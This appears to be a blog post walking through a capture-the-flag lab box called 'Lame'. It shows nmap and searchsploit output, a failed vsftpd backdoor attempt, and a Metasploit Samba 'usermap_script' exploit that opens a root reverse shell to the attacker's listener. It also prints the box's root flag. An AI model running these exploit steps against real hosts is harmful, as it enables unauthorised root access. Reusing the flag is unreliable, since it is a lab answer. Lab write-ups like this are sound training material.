pharaohsec

July 09, 2018

Lame

Scanning The target

root@goldeneagle:~# nmap -sT -sV -A -O 10.10.10.3

Starting Nmap 6.40 ( http://nmap.org ) at 2017-05-14 01:53 EDT

Nmap scan report for 10.10.10.3

Host is up (0.36s latency).

Not shown: 996 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)

|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), Crestron XPanel control system (90%), Netgear DG834G WAP or Western Digital WD TV media player (90%), Linux 2.4.18 (90%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N66U WAP (Linux 2.6) (89%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 2 hops

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

| smb-os-discovery:

| OS: Unix (Samba 3.0.20-Debian)

| NetBIOS computer name:

| Workgroup: WORKGROUP

|_ System time: 2017-05-13T12:34:38-04:00

TRACEROUTE (using proto 1/icmp)

HOP RTT ADDRESS

1 316.29 ms 10.10.12.1

2 316.44 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 114.57 seconds

now its a list of open ports but here I’m just focusing on what I’m exploiting so I’ll just start with the FTP which is the first result of the open ports. Its running “vsftpd 2.3.4” server

by digging vuln search using searchsploit

root@goldeneagle:/opt/exploit-database# ./searchsploit vsftpd

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------

Exploit Title | Path

| (/opt/exploit-database/platforms/)

vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption | linux/dos/5814.pl

vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | windows/dos/31818.sh

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | windows/dos/31819.pl

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb

Now its time to load my MSF

--------------------------------

msf > search vsftp

[!] Module database cache not built yet, using slow search

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

Ok lets go and exploit that target :D

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 21 yes The target port (TCP)

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3

rhost => 10.10.10.3

msf exploit(vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 10.10.10.3:21 - USER: 331 Please specify the password.

[*] Exploit completed, but no session was created.

opsssss, I dont know what is the issue :( fuck that i have to try harder

so i will save the below command to exploit later

$msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor;set RHOST 10.10.10.3;"

I have to find another way .....................

Let me Check what is the OS:Unix (Samba 3.0.20-Debian) .hmmmmmmmmm lets google to find exploits if i am lucky

Samba "username map script" Command Execution This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. well we have MSF module for that lets try

msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 139 yes The target port (TCP)

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(usermap_script) > set rhost 10.10.10.3

rhost => 10.10.10.3

msf exploit(usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.13.186:4444

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo o41hy8PKew3xCgmK;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\no41hy8PKew3xCgmK\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (10.10.13.186:4444 -> 10.10.10.3:44740) at 2017-05-14 02:48:25 -0400 :D

uid=0(root) gid=0(root) #shell spawned wohoooooo

bin

boot

cdrom

dev

etc

home

initrd

initrd.img

lib

lost+found

media

mnt

nohup.out

opt

proc

root

sbin

srv

sys

tmp

usr

var

vmlinuz

pwd

cd root

Desktop

reset_logs.sh

root.txt

vnc.log

cat root.txt

92caac3be140ef409e45721348a4e9df #here is my proof

Search This Blog

pharaohsec

Comments

Post a Comment

Popular Posts

cypher-anxiety

Cool Effects